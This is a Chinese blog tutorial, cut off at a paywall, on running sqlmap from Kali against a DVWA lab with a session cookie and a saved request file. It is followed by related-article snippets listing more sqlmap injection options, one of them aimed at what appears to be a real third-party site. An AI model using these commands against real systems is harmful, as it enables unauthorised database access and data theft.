sqlmap指定cookie_sqlmap使用

最新推荐文章于 2024-05-13 11:59:31 发布
最新推荐文章于 2024-05-13 11:59:31 发布
阅读量1.4k 收藏 3
点赞数
文章标签: sqlmap指定cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42128393/article/details/113542600
版权
本文介绍了如何在Kali Linux环境下使用sqlmap工具进行SQL注入攻击,特别是针对需要指定cookie的情况。内容包括sqlmap的基本用法、检测注入漏洞、获取系统信息、查看数据库信息、枚举数据表以及转储数据等操作。
摘要由CSDN通过智能技术生成

kali中sqlmap的使用

sqlmap简介:

SQLmap是一个自动化的SQL注入攻击,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。

目前支持Mysql、Oracle、MS-SQL、PostgreSQL与Access等数据库。

SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包含数据库指纹、枚举、数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。

sqlmap使用(本次是利用kail linux中自带的sqlmap进行介绍)

sqlmap -u(参数指定目标注入地址)检测出存在的利用漏洞

格式:sqlmap -u  "url地址" --cookie="cookie信息"  (若不需要登录就不需要后面的cookie)

获取系统基本信息(需要携带登录态,若不需要登录就不需要携带cookie)

root@tiankali:~# sqlmap -u "http://192.168.1.77:88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=1cegouc0pe4am7rup4m2t4a746"

35a615fd8525307e9628297419f2df80.png

显示系统信息:

c09b5096cf5d3c52fb5b5b07d17e0bd6.png

以上使用-u需要输入很多http的头部信息,我们可以使用-r,将http中的头部和cookie信息放到一个文件中;

sqlmap -r

格式:sqlmap -r  文件名   备注:创建的header.txt文件一定要在当前sqlmap的目录下面

创建header.txt文件,将header头部信息复制保持到该文件中;

GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1

Host: 192.168.1.77:88

Connection: keep-alive

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: security=low; PHPSESSID=1cegouc0pe4am7rup4m2t4a746

root@tiankali:~# sqlmap -r headersqlmap.txt

a8949f2122d5f891606b70d2f52bc9f3.png

同样也获取到系统信息

d9af1992e7754197ce96c0ed05cfde37.png

--current-db

格式:sql

最低0.47元/天 解锁文章
水瓶座的兔子
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap指定cookie_SQLmap
weixin_26812607的博客
01-30 551
**参数解释**星号在注入的过程中,有时候是伪静态的页面,可以使用星号表示可能存在注入的部分--data使用post方式提交的时候,就需要用到data参数了-p当我们已经事先知道哪一个参数存在注入就可以直接使用-p来指定,从而减少运行时间--level不同的level等级,SQLMAP所采用的策略也不近相同,当–level的参数设定为2或者2以上的时候,sqlmap会尝试注入Cookie参数;当–...
sqlmap指定cookie_sqlmap处理cookie数据
weixin_34061793的博客
12-24 1886
Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在web应用中至关重要,用户的唯一标识session id也是存在cookie中的。那么,在sqlmap使用的时候,也会经常需要考虑到cookiesqlmap也提供了和cookie相关的命令,本文将会介绍。1. cookie保存了用户登录状态很多网站的功能都是需要登陆后才能访问,而http本身是无状态的,因此服务器...
【网络安全 渗透工具】SQLmap精讲(全网最详细图文教程)_sqlmap poc(2)
最新发布
2401_84969611的博客
05-13 775
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。目标脱库账号其它。
sqlmap指定cookie_sqlmap
weixin_35732273的博客
01-30 203
sqlmap的一些使用技巧-v 3 显示注入过程的payload-d 直连数据库-u 检测sql注入-l log文件,可以是burp等代理的log文件-m target.txt 多个url检测-r 可将post请求方式保存在一个txt中,sqlmap通过post方式检测目标-g 使用google引擎 -g “inurl:\”.php”--data=DATA 指明参数是哪些(以post形式提交,并检...
sqlmap指定cookie_SQLMap使用
weixin_39628041的博客
01-30 2030
SQLMapsqlmap是一款SQL注入漏洞测试工具,支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。常用参数​注意:必须指定至少一个目标-u#指定URL,必须使用双引号包含url--...
SQLMAP进阶使用 --cookie
Z_l123的博客
02-19 5581
实验原理 Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。 1.访问DVWA网站 1)访问dvwa,并登录。admin password 2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
Sqlmap使用手册中文版
01-13
当进行Web应用审计时,如果发现页面中的参数(如GET、POST或Cookie)可能受到用户输入的影响,Sqlmap可以帮助测试是否存在SQL注入漏洞。例如,通过对URL参数进行篡改,观察响应的变化,可以初步判断是否存在注入点。...
sqlmap使用介绍
06-22
### SQLMap使用详解 #### 一、SQLMap简介与功能 **SQLMap**是一款功能强大的开源SQL注入工具,主要用于检测并利用网站上的SQL注入漏洞。该工具由Python编写,因此在使用前需确保已安装Python环境。SQLMap支持多种...
SQLmap使用指令详解
06-12
### SQLmap使用指令详解 #### 一、概述 SQLmap是一款功能强大的开源工具,用于自动化地检测和利用SQL注入漏洞。它可以对Web应用程序中的输入参数进行测试,寻找那些容易受到SQL注入攻击的地方,并进一步利用这些...
SQLMAP参数介绍.pdf
09-25
通过使用SQLMAP,安全研究员和渗透测试人员能够有效地发现并利用多种类型的SQL注入技术,包括基于布尔的盲注、基于时间的盲注、基于报错注入、联合查询注入以及堆查询注入。以下是关于SQLMAP的详细介绍: 1. **...
sqlmap指定cookie_注入工具 -- sqlmap(指定位置注入和优化性能)
weixin_33618482的博客
01-10 399
一、指定位置注入1、-p,指定具体探测的参数sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p "id,name" --dbs 对id和name都进行探测2、--skip,忽略探测...
sqlmap应用之cookie参数
qq_44060093的博客
08-21 4604
访问dvwa,将级别调为low 步骤一:如果不带入cookie参数,直接sqlmap查询失败 SQLMAP直接使用url来进行注入,因为之前没有登录DVWA所以被重定向到login.php界面,直接注入失败 步骤二:使用burpsuit抓包工具,在sql注入菜单处提交参数请求时进行数据抓包,获取cookies值 用通用的url请求,在burp里面进行抓包,信息如图,已经获取了cookie值 发现sqlmap可以跑出数据来了,构造其他语句,继续查取数据 查找所有数据库 查找cms数据库下的表
利用SQLMap进行cookie注入
kuxing100的专栏
05-05 2015
SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用到cookie注入,一遇到cookie注入就去使用注入中转工具,比较麻烦。刚好今天群里的USB问起sqlmap是否支持cookie注入,就研究了一下,发现其实sqlmap进行cookie注入很简单的。 测试URL:   参数获取使用的是
sqlmap指定cookie_Sqlmap Cookie注入 教程
weixin_34891129的博客
01-14 1273
Sqlmap是什么我就不多说了,它就是一个渗透测试工具,主要是用来SQL注入的,支持很多种类型的数据库。用工具sqlmap来做cookie注入很简单,只需要用sqlmap cookie注入命令即可!具体操作如下:1、检测是否有cookie注入?root@Kali:~# sqlmap -u http://www.xxxxxx.com/Newsshow.asp --cookie "ID=212" --...
sqlmap使用post方法对cookie进行注入
u012684933的专栏
03-27 6245
sqlmap默认使用get方法,并且只有在注入level>=2的时候才会对cookie进行注入,要想使用post方法,但是如果post的参数为0,可以指定 --data 为空,下面以cookie名为CNZZDATA3834609为例进行注入:  sqlmap -u http://www.beihai.ccoo.cn/forum/GetUserInfo.Asp?id=0  --cookie="CN
sqlmap之access——cookie注入
qq_45300786的博客
07-18 297
先把这个GET传参(id=171)删了 然后复制下这个网址,用sqlmapsqlmap.py -u "http://59.63.200.79:8004/shownews.asp" --cookie "id=170" level 2 包网址起来,然后 参数,后面跟 值包起来, 等级为2 才会对cookie注入进行检车 跑出来类型是Cookie ...
关于cookie注入使用sqlmap
weixin_43326436的博客
06-10 308
1. python2 sqlmap.py -u http://challenge-d18082c9146962c3.sandbox.ctfhub.com:10080 --cookie id=1 --dbs --level 2 2. python2 sqlmap.py -u http://challenge-d18082c9146962c3.sandbox.ctfhub.com:10080 --cookie id=1 --D sqli --tables --level 2 3. python2 sqlmap.
Sqlmap2021 -- Cookie注入
weixin_41489908的博客
07-07 4064
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。 ---- 网易云热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.
kali攻防第7章补充 SQLMAP介绍之Cookie注入
安全参透之旅
12-03 1888
SQLMAP介绍之Cookie注入   准备工具 1、KALI 系统IP:10.10.10.131 2、受害网站:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值